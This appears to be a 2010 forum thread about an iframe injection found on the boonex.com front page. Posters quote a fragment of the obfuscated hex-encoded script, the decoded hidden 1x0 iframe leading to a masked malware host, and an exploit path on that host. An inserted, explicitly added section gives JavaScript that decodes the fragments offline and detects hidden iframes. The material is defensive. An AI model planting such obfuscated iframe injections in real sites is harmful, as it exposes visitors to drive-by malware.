Avast Antivirus has just alerted me to three instances of a Trojan horse on the www.boonex.com front page. This is a JavaScript/iframe/Java-based exploit placed somewhere in the Boonex.com code or templates.
Someone should investigate this immediately. If it's a false positive, it should be reported to Avast for the next virus definition update. (Update: This is a confirmed iframe/trojan exploit; see the comments for details.) If someone else receives an alert, please look at the logs and report the URLs of the affected pages, along with your virus software brand.
Until this is resolved, I suggest turning JavaScript off in your browser, or otherwise being doubly sure your virus protection and browser choice are up to standard. The exploit itself depends on a Java applet, so turning Java off at boonex.com is a good idea too.
So far Unity seems to be unaffected, while several other areas cause the alerts below.
Avast Report:
16.5.2010 22:59:44 http://www.boonex.com/ [L] HTML:IFrame-NO [Trj] (0)
16.5.2010 22:59:48 http://www.boonex.com/livehelp/include/javascript.php [L] HTML:IFrame-NO [Trj] (0)
16.5.2010 22:59:53 http://www.boonex.com/livehelp/locale/en/images/InitateChat.png [L] HTML:IFrame-NO [Trj] (0)
While the last two are reported, the files themselves don't seem to exist. The only infection I can see is the obfuscated JavaScript at the bottom of the HTML, creating an iframe that links to a malware server.
Screenshots:
<!-- stardevelop.com Live Help International Copyright - All Rights Reserved //-->
<!-- BEGIN stardevelop.com Live Help Messenger Code - Copyright - NOT PERMITTED TO MODIFY IMAGE MAP/CODE/LINKS //-->
<script language="JavaScript" type="text/JavaScript" src="http://www.boonex.com/livehelp/include/javascript.php"></script>
<!-- END stardevelop.com Live Help
Since no malware has ever been written for the BeOS, I'm safe from all forms of threats. Ha ha.
<!-- stardevelop.com Live Help International Copyright - All Rights Reserved //-->
<!-- BEGIN stardevelop.com Live Help Messenger Code - Copyright - NOT PERMITTED TO MODIFY IMAGE MAP/CODE/LINKS //-->
<div id="floatLayer" align="left" style="position:absolute; left:10px; top:10px; visibility:hidden; z-index:5000;">
<map
<script language=JavaScript>
var uwdblfsaodg = 'sYLYnyre3csYLYnyre69sYLYnyre66';var welvbvsnxdg = 'sYLYnyre72';var vmxygonhnmd = 'sYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre20sYLYnyre6esYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre3dsYLYnyre22';var poowgoljvco = 'sYLYnyre75sYLYnyre6fsYLYnyre75sYLYnyre6esYLYnyre61sYLYnyre71sYLYnyre70sYLYnyre67sYLYnyre77sYLYnyre68sYLYnyre77';var qxqcqdatksf = 'sYLYnyre22sYLYnyre20sYLYnyre77sYLYnyre69sYLYnyre64sYLYnyre74sYLYnyre68sYLYnyre3dsYLYnyre22sYLYnyre31sYLYnyre22sYLYnyre20sYLYnyre68sYLYnyre65sYLYnyre69sYLYnyre67sYLYnyre68sYLYnyre74sYLYnyre3dsYLYnyre22sYLYnyre30sYLYnyre22';var
http://www.codesatori.com/test/boonex_source.php
And here's an archived version where you can look up the JavaScript after it (hopefully) gets removed:
http://www.codesatori.com/test/boonex_source.html
<iframe name="uounaqpgwhw" width="1" height="0" src="http://********************" marginwidth="1" marginheight="0" title="uounaqpgwhw" scrolling="no" border="0" frameborder="0"></iframe>
So it's a classic iframe insertion hack there. Now let's patch up those systems!
The URL in the script currently
You can see that /phixnew/index.php at the above URL contains some sort of Java applet-based exploit, while another URL under the same path is an ActiveX-based trojan.
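Decoding the injected script statically, as an added example that is not part of the original thread and is neither BoonEx's code nor the poster's tooling: it recovers the per-byte marker from the quoted fragments, hex-decodes them in source order to reconstruct the tag the script writes into the page, and then runs a simple hidden-iframe check over a constructed page fragment. The marker-recovery loop and the "1 pixel or hidden" heuristic are my own assumptions about this obfuscator and about what a scanner might key on, not Avast's HTML:IFrame-NO signature; the sample page, including the `/help/chat` path of the harmless iframe, is constructed, and the malware host stays masked as it was published in the thread.

```javascript
// Added example: static decoder for the obfuscation scheme in the injected
// script quoted in this thread. This is my own illustration, not BoonEx code
// and not the poster's tooling. Each `var` holds a piece of the final HTML as
// two-digit hex bytes, every byte prefixed by one fixed marker ('sYLYnyre'
// in the sample); the original script joins the pieces and writes them into
// the page. Decoding offline shows what gets injected without running the
// script or contacting the malware host.

// Constructed input: the five fragments exactly as quoted in the thread. The
// quote stops after `var qxqcqdatksf`, so only the head of the tag (up to the
// height attribute) is recoverable; the src URL is not in these bytes.
const INJECTED_SCRIPT =
  "var uwdblfsaodg = 'sYLYnyre3csYLYnyre69sYLYnyre66';" +
  "var welvbvsnxdg = 'sYLYnyre72';" +
  "var vmxygonhnmd = 'sYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre20sYLYnyre6e" +
  "sYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre3dsYLYnyre22';" +
  "var poowgoljvco = 'sYLYnyre75sYLYnyre6fsYLYnyre75sYLYnyre6esYLYnyre61" +
  "sYLYnyre71sYLYnyre70sYLYnyre67sYLYnyre77sYLYnyre68sYLYnyre77';" +
  "var qxqcqdatksf = 'sYLYnyre22sYLYnyre20sYLYnyre77sYLYnyre69sYLYnyre64" +
  "sYLYnyre74sYLYnyre68sYLYnyre3dsYLYnyre22sYLYnyre31sYLYnyre22sYLYnyre20" +
  "sYLYnyre68sYLYnyre65sYLYnyre69sYLYnyre67sYLYnyre68sYLYnyre74sYLYnyre3d" +
  "sYLYnyre22sYLYnyre30sYLYnyre22';";

// Pull every string literal assigned with `var name = '...'`, in source order.
function extractFragments(script) {
  const out = [];
  const re = /var\s+\w+\s*=\s*'([^']*)'/g;
  let m;
  while ((m = re.exec(script)) !== null) out.push(m[1]);
  return out;
}

// Recover the marker (assumed heuristic): the shortest prefix of the first
// fragment such that splitting every fragment on it leaves only two-hex-digit
// chunks. Trying prefixes shortest-first avoids the trap where the marker
// itself ends in a hex letter (the trailing 'e' of 'sYLYnyre' would otherwise
// be swallowed into a byte).
function findMarker(fragments) {
  const first = fragments[0];
  for (let len = 1; len < first.length; len++) {
    const marker = first.slice(0, len);
    const consistent = fragments.every((f) => {
      const parts = f.split(marker);
      return parts[0] === '' && parts.slice(1).every((p) => /^[0-9a-fA-F]{2}$/.test(p));
    });
    if (consistent) return marker;
  }
  throw new Error('no consistent marker found');
}

// Strip the marker and turn each hex byte into a character.
function decodeFragment(fragment, marker) {
  return fragment.split(marker).slice(1)
    .map((hex) => String.fromCharCode(parseInt(hex, 16)))
    .join('');
}

// Reconstruct the HTML the script would have written into the page.
function deobfuscate(script) {
  const fragments = extractFragments(script);
  const marker = findMarker(fragments);
  return fragments.map((f) => decodeFragment(f, marker)).join('');
}

// Detection side (assumed heuristic, not Avast's rule): flag iframes sized or
// styled so the visitor cannot see them, which is what the 1x0 iframe the
// poster found looks like in the page source.
function findHiddenIframes(html) {
  const hits = [];
  const tagRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[0];
    const attr = (name) => {
      const a = new RegExp('\\b' + name + '\\s*=\\s*"?([^"\\s>]*)', 'i').exec(tag);
      return a ? a[1] : null;
    };
    const w = parseInt(attr('width'), 10);
    const h = parseInt(attr('height'), 10);
    const tiny = (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1);
    const styledHidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
    if (tiny || styledHidden) hits.push({ tag, src: attr('src') });
  }
  return hits;
}

// Constructed page fragment: the iframe the poster decoded, with the host
// masked as it was published, beside a harmless iframe (hypothetical path).
const SAMPLE_PAGE =
  '<p>footer</p>\n' +
  '<iframe name="uounaqpgwhw" width="1" height="0" src="http://********************"' +
  ' marginwidth="1" marginheight="0" title="uounaqpgwhw" scrolling="no" border="0" frameborder="0"></iframe>\n' +
  '<iframe src="/help/chat" width="300" height="200"></iframe>';

console.log(deobfuscate(INJECTED_SCRIPT));
console.log(findHiddenIframes(SAMPLE_PAGE));
```

Run with Node; the first line printed is the decoded head of the tag, `<iframe name="uounaqpgwhw" width="1" height="0"`, which matches the iframe the poster published, and the second is the single hidden iframe with its (masked) src. Recovering the marker by validation rather than by eyeballing matters because these kits rotate the marker string per infection; the hex payload underneath is the stable part.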
And BeOS is like a cabin in the woods... No crime to worry about, but then again not much else either. It's very safe, however! =)
We have a different plan... to not allow anyone to control you :)
I like to think this was an automated exploit, but given that it rolled in on a Sunday (which is when staff are rarely around here), and given that this site runs on proprietary software, it may also be a targeted exploit attempt.
AlexT, good job in getting it removed. So was there a patch you had to implement? If so (which I would think there was), when are you going to release that patch so that the thousands of sites running this platform can utilize that security patch?
Regards,
DosDawg
My educated guess is that either 1) someone was able to modify Boonex.com templates due to a public vulnerability in a template/templating file (which is the better case), or 2) someone gained administrator-level access to the site and did it (which is the worse case). In either case, it would